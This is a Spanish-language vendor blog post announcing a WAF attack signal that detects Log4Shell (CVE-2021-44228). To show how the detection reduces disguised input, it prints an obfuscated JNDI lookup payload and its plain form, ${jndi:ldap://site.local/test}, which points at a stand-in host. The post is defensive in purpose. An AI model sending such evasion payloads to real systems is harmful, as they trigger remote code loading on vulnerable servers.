Anuncio: La señal de ataque LOG4J-JNDI ya está disponible

Contexto

En diciembre de 2021, el sector se vio afectado por la vulnerabilidad CVE-2021-44228, más conocida como Log4Shell. Debido al amplio uso de la biblioteca Log4j, una gran variedad de software quedó expuesta a amenazas. Para colmo, como este ataque afectó a aplicaciones que interactuaban con registros, incluso los servicios a los que los atacantes no tenían acceso directo podían ser vulnerables si una de las cargas útiles pasaba por su canalización de registros.

Nuestro Customer Security Operations Center (CSOC) y los equipos de Security Research trabajaron codo con codo y desplegaron con rapidez un parche virtual para todos nuestros clientes. Establecimos equipos internos de respuesta ante incidentes y supervisamos el proceso en todo momento para garantizar que no se vieran afectados por esta vulnerabilidad crítica. Tras unos días, publicamos algunos de nuestros datos y descubrimientos en relación con los diversos ataques de Log4Shell. Mientras supervisábamos el proyecto, vimos cómo las variantes de la carga útil cambiaban a medida que los atacantes desarrollaban técnicas de evasión para que los patrones comunes de WAF no los detectaran.

Ampliación de SmartParse

Aunque todas nuestras señales de ataques y anomalías usan nuestra tecnología SmartParse, a veces implementamos parches virtuales basados en regex cuando se necesita una respuesta inmediata, puesto que esto nos permite poner el parche a disposición de nuestros clientes en cuestión de minutos. Sin embargo, con la gran cantidad de variantes que se habían creado, sabíamos que, gracias a las posibilidades de SmartParse, había una forma mejor de detectar estos ataques.

Nuestros ingenieros se pusieron manos a la obra para desarrollar un método que ampliara SmartParse y redujera una carga útil compleja de Log4Shell a su forma más básica. Veamos una de las cargas útiles más complejas en su estado original:

${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-}/site.local/test}

Con SmartParse podemos transformarla en su forma más básica:

${jndi:ldap://site.local/test}

Detección y protección avanzadas de Log4Shell

SmartParse proporciona una detección avanzada y precisa con un porcentaje mínimo o nulo de falsos positivos. Además, no tiene que gestionar patrones de regex, que son cada vez más amplios, ni depende de ellos.

Hemos introducido esta capacidad como una nueva señal de ataque (LOG4J-JNDI). En un principio, la lanzamos dentro de nuestro programa Fastly Security Labs. Después de observarla durante varios meses, ahora la ofrecemos a todos los clientes, en disponibilidad general, de forma oficial. No solo mejora la detección en comparación con la coincidencia basada en regex, sino que, con las señales de ataque, también permite construir y crear reglas a nivel de organización o de empresa, de modo que es posible implementar políticas de respuesta globales en muy poco tiempo.

Siguientes pasos

Si eres cliente de Fastly, al iniciar sesión en la consola del WAF de última generación, ya deberías ver la nueva señal de ataque LOG4J-JNDI en tu registro de peticiones. La señal está activada de forma predeterminada con un bloqueo basado en umbrales, pero puedes ajustarlo como te resulte más cómodo o implementar el bloqueo instantáneo en caso necesario. 

Si estás leyendo este artículo y todavía no utilizas un WAF o usas uno heredado basado en la comprobación de coincidencia de patrones para detectar ataques por inyección según OWASP o de Log4Shell, estaremos encantados de ofrecerte una demostración del WAF de última generación de Fastly (con tecnología de Signal Sciences). Te mostraremos la alternativa a la tediosa gestión y a los falsos positivos tan habituales en los WAF heredados. Ponte en contacto con nuestros expertos en seguridad para obtener más información.